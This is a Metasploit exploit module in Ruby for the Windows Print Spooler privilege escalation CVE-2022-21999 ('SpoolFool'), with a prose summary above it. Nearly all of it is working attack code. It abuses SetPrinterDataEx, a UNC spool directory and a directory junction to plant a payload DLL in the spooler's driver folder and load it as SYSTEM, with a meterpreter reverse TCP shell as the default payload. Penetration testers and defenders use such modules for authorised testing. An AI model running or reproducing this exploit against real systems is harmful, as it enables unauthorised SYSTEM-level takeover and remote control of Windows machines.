The Windows Print Spooler has a privilege escalation vulnerability that can be leveraged to achieve code execution as SYSTEM. The SpoolDirectory, a configuration setting that holds the path that a printer's spooled jobs are sent to, is writable for all users, and it can be configured via SetPrinterDataEx() provided the caller has the PRINTER_ACCESS_ADMINISTER permission. If the SpoolDirectory path does not exist, it will be created once the print spooler reinitializes. Calling SetPrinterDataEx() with the CopyFiles\ registry key will load the dll passed in as the pData argument, meaning that writing a dll to the SpoolDirectory location can be loaded by the print spooler. Using a directory junction and UNC path for the SpoolDirectory, the exploit writes a payload to C:\Windows\System32\spool\drivers\x64\4 and loads it by calling SetPrinterDataEx(), resulting in code execution as SYSTEM.
13da3a4ac96e1294b05c31bc91c0e8cb##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::FileSystem
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2022-21999 SpoolFool Privesc',
'Description' => %q{
The Windows Print Spooler has a privilege escalation vulnerability that
can be leveraged to achieve code execution as SYSTEM.
The `SpoolDirectory`, a configuration setting that holds the path that
a printer's spooled jobs are sent to, is writable for all users, and it can
be configured via `SetPrinterDataEx()` provided the caller has the
`PRINTER_ACCESS_ADMINISTER` permission. If the `SpoolDirectory` path does not
exist, it will be created once the print spooler reinitializes.
Calling `SetPrinterDataEx()` with the `CopyFiles\` registry key will load the
dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory`
location can be loaded by the print spooler.
Using a directory junction and UNC path for the `SpoolDirectory`, the exploit
writes a payload to `C:\Windows\System32\spool\drivers\x64\4` and loads it
by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.
},
'License' => MSF_LICENSE,
'Author' => [
'Oliver Lyak', # Vuln discovery and PoC
'Shelby Pace' # metasploit module
],
'Platform' => [ 'win' ],
'Arch' => ARCH_X64,
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[
'Auto',
{
'Platform' => 'win',
'Arch' => ARCH_X64,
'DefaultOptions' => {
'Payload' => 'windows/x64/meterpreter/reverse_tcp',
'PrependMigrate' => true
}
}
]
],
'Privileged' => true,
'References' => [
[ 'URL', 'https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81'],
[ 'CVE', '2022-21999']
],
'DisclosureDate' => '2022-02-08',
'DefaultTarget' => 0,
'Notes' => {
'AKA' => [ 'SpoolFool' ],
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'Reliability' => [ UNRELIABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
]
}
}
)
)
register_options(
[
OptString.new('PATH', [ true, 'Path to hold the payload', '%TEMP%' ]),
OptInt.new('WAIT_TIME', [ true, 'Time to wait in seconds for spooler to restart', 5 ])
]
)
end
def check
s_info = sysinfo['OS']
unless s_info =~ /windows/i
return CheckCode::Safe('This module only supports Windows targets.')
end
_major, _minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntdll.dll')
case s_info
when /windows 7/i
return CheckCode::Safe('Windows 7 is technically vulnerable, though it requires a reboot.')
when /windows 10/i, /windows 2019\+/i, /windows 2016\+/i # 2019 gets reported as 2016 by meterpreter
return CheckCode::Appears if build <= 18362
return CheckCode::Appears if revision < 1526
end
CheckCode::Safe
end
def winspool
session.railgun.winspool
end
def spoolss
session.railgun.spoolss
end
def advapi32
session.railgun.advapi32
end
def get_printer_name
if target_is_server?
return "#{get_default_printer}\x00"
end
"#{Rex::Text.rand_text_alpha(5..12)}\x00"
end
def target_is_server?
s_info = sysinfo['OS']
s_info =~ /server/i || s_info =~ /\d{4}\+/
end
# Windows usually has Print to PDF or XPS Document Writer
# available by default
def get_default_printer
xps = 'Microsoft XPS Document Writer'
pdf = 'Microsoft Print to PDF'
local_const = session.railgun.const('PRINTER_ENUM_LOCAL')
ret = winspool.EnumPrintersA(
local_const,
nil,
1,
nil,
0,
8,
8
)
unless ret['pcbNeeded'] > 0
fail_with(Failure::UnexpectedReply, 'Failed to determine bytes needed for enumerating printers.')
end
bytes_needed = ret['pcbNeeded']
ret = winspool.EnumPrintersA(
local_const,
nil,
1,
bytes_needed,
bytes_needed,
8,
8
)
fail_with(Failure::UnexpectedReply, 'Failed to enumerate local printers.') unless ret['return']
printer_struct = ret['pPrinterEnum']
return xps if printer_struct.include?(xps)
return pdf if printer_struct.include?(pdf)
end
def get_driver_name
if @printer_name.include?('XPS') || !target_is_server?
return "Microsoft XPS Document Writer v4\x00"
end
"Microsoft Print To PDF\x00"
end
# packs struct according to member types and data
def get_printer_info_struct
server_name = "#{Rex::Text.rand_text_alpha(5..12)}\x00"
port_name = "LPT1:\x00"
driver_name = get_driver_name
print_proc_name = "winprint\x00"
p_datatype = "RAW\x00"
print_strs = "#{server_name}#{@printer_name}#{port_name}#{driver_name}#{print_proc_name}#{p_datatype}"
base = session.railgun.util.alloc_and_write_string(print_strs)
fail_with(Failure::UnexpectedReply, 'Failed to allocate strings for PRINTER_INFO_2 structure.') unless base
print_info_struct = [
base + print_strs.index(server_name),
base + print_strs.index(@printer_name), 0,
base + print_strs.index(port_name),
base + print_strs.index(driver_name), 0, 0, 0, 0,
base + print_strs.index(print_proc_name),
base + print_strs.index(p_datatype), 0, 0,
client.railgun.const('PRINTER_ATTRIBUTE_LOCAL'),
0, 0, 0, 0, 0, 0, 0
]
# https://docs.microsoft.com/en-us/windows/win32/printdocs/printer-info-2
print_info_struct.pack('QQQQQQQQQQQQQLLLLLLLL')
end
def add_printer
struct = get_printer_info_struct
fail_with(Failure::UnexpectedReply, 'Failed to create PRINTER_INFO_2 STRUCT.') unless struct
ret = winspool.AddPrinterA(nil, 2, struct)
fail_with(Failure::UnexpectedReply, ret['ErrorMessage']) if ret['GetLastError'] != 0
print_good("Printer #{@printer_name} was successfully added.")
ret['return']
end
def set_spool_directory(handle, spool_dir)
print_status("Setting spool directory: #{spool_dir}")
ret = set_printer_data(handle, '\\', 'SpoolDirectory', spool_dir)
unless ret['GetLastError'] == 0
fail_with(Failure::UnexpectedReply, 'Failed to set spool directory.')
end
end
def restart_spooler(handle)
print_status('Attempting to restart print spooler.')
term_path = 'C:\\Windows\\System32\\AppVTerminator.dll'
ret = set_printer_data(handle, 'CopyFiles\\', 'Module', term_path)
unless ret['GetLastError'] == 0
fail_with(Failure::UnexpectedReply, 'Failed to terminate print spooler service.')
end
end
def set_printer_data(handle, key_name, value_name, config_data)
winspool.SetPrinterDataExA(handle,
key_name,
value_name,
REG_SZ,
config_data,
config_data.length)
end
# set read / execute permissions on dll
# first get the security info in order to modify it
# and pass back to SetNamedSecurityInfo()
def set_perms_on_payload
obj_type = session.railgun.const('SE_FILE_OBJECT')
sec_info = session.railgun.const('DACL_SECURITY_INFORMATION')
ret = advapi32.GetNamedSecurityInfoA(
@payload_path,
obj_type,
sec_info,
nil,
nil,
8,
nil,
8
)
unless ret['return'] == 0
fail_with(Failure::UnexpectedReply, 'Failed to get payload security info.')
end
ret = advapi32.BuildExplicitAccessWithNameA(
'\x00' * 48,
'SYSTEM',
session.railgun.const('GENERIC_ALL'),
session.railgun.const('GRANT_ACCESS'),
session.railgun.const('NO_INHERITANCE')
)
ea_struct = ret['pExplicitAccess']
if ea_struct.empty?
fail_with(Failure::UnexpectedReply, 'Failed to retrieve EXPLICIT_ACCESS structure.')
end
ret = advapi32.SetEntriesInAclA(1, ea_struct, nil, 8)
fail_with(Failure::UnexpectedReply, "Failed to create new ACL: #{ret['GetLastError']}") if ret['return'] != 0
# need to first access pointer to the new acl
# in order to read the acl's header (8 bytes) to determine
# size of entire acl structure
new_acl_ptr = ret['NewAcl'].unpack('Q').first
acl_header = session.railgun.util.memread(new_acl_ptr, 8)
# https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-acl
acl_mems = acl_header.unpack('CCSSS')
struct_size = acl_mems&.at(2)
unless struct_size
fail_with(Failure::UnexpectedReply, 'Failed to retrieve size of ACL structure.')
end
acl_struct = session.railgun.util.memread(new_acl_ptr, struct_size)
ret = advapi32.SetNamedSecurityInfoA(
@payload_path,
obj_type,
sec_info,
nil,
nil,
acl_struct,
nil
)
fail_with(Failure::UnexpectedReply, 'Failed to set permissions on payload.') if ret['return'] != 0
print_status('Payload should have read / execute permissions now.')
end
def open_printer
print_ptr = session.railgun.util.alloc_and_write_string('RAW')
lp_default = [ print_ptr, 0, session.railgun.const('PRINTER_ACCESS_ADMINISTER') ]
lp_default_struct = lp_default.pack('QQS')
winspool.OpenPrinterA(@printer_name, 8, lp_default_struct)
end
def dir_path
datastore['PATH']
end
def count
datastore['WAIT_TIME']
end
def to_unc(path)
path.gsub('C:', '\\\\\localhost\\C$')
end
def write_and_load_dll(handle)
payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.dll"
payload_data = generate_payload_dll
@payload_path = "#{@v4_dir}\\#{payload_name}"
register_file_for_cleanup(@payload_path)
register_dir_for_cleanup(@v4_dir)
print_status("Writing payload to #{@payload_path}.")
unless write_file(@payload_path, payload_data)
fail_with(Failure::UnexpectedReply, 'Failed to write payload.')
end
print_status('Attempting to set permissions for payload.')
set_perms_on_payload
set_printer_data(handle, 'CopyFiles\\', 'Module', @payload_path)
end
def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
unless session.arch == ARCH_X64
fail_with(Failure::BadConfig, 'This exploit only supports x64 sessions')
end
@printer_name = get_printer_name
tmp_dir = Rex::Text.rand_text_alpha(5..12)
tmp_path = expand_path("#{dir_path}\\#{tmp_dir}")
# the user name may get truncated which won't work
# when setting the UNC path
dirs = tmp_path.split('\\')
if dirs.index('Users')
full_uname = client.sys.config.getuid.split('\\').last
dirs[dirs.index('Users') + 1] = full_uname
tmp_path = dirs.join('\\')
end
print_status("Making base directory: #{tmp_path}")
unless mkdir(tmp_path)
fail_with(Failure::NoAccess,
'Permissions may be insufficient.' \
'Consider choosing a different base path for the exploit.')
end
handle = nil
if target_is_server?
ret = open_printer
fail_with(Failure::UnexpectedReply, 'Failed to open default printer.') unless ret['return']
handle = ret['phPrinter']
else
handle = add_printer
end
driver_dir = 'C:\\Windows\\System32\\spool\\drivers\\x64'
@v4_dir = "#{driver_dir}\\4"
fail_with(Failure::NotFound, 'Driver directory not found.') unless directory?(driver_dir)
# if directory already exists, attempt the exploit
if directory?(@v4_dir)
print_status('v4 directory already exists.')
else
set_spool_directory(handle, to_unc("#{tmp_path}\\4"))
print_status("Creating junction point: #{tmp_path} -> #{driver_dir}")
junction = create_junction(tmp_path, driver_dir)
fail_with(Failure::UnexpectedReply, 'Failed to create junction point.') unless junction
# now restart spooler to create spool directory
print_status('Creating the spool directory by restarting spooler...')
restart_spooler(handle)
print_status("Sleeping for #{count} seconds.")
Rex.sleep(count)
ret = open_printer
unless ret['return']
fail_with(Failure::Unreachable, 'The print spooler service failed to start.')
end
handle = ret['phPrinter']
unless directory?(@v4_dir)
fail_with(Failure::UnexpectedReply, 'Directory was not created.')
end
print_good('Directory was successfully created.')
end
write_and_load_dll(handle)
ensure
if handle && !target_is_server?
spoolss.DeletePrinter(handle)
end
spoolss.ClosePrinter(handle) unless handle.nil?
end
end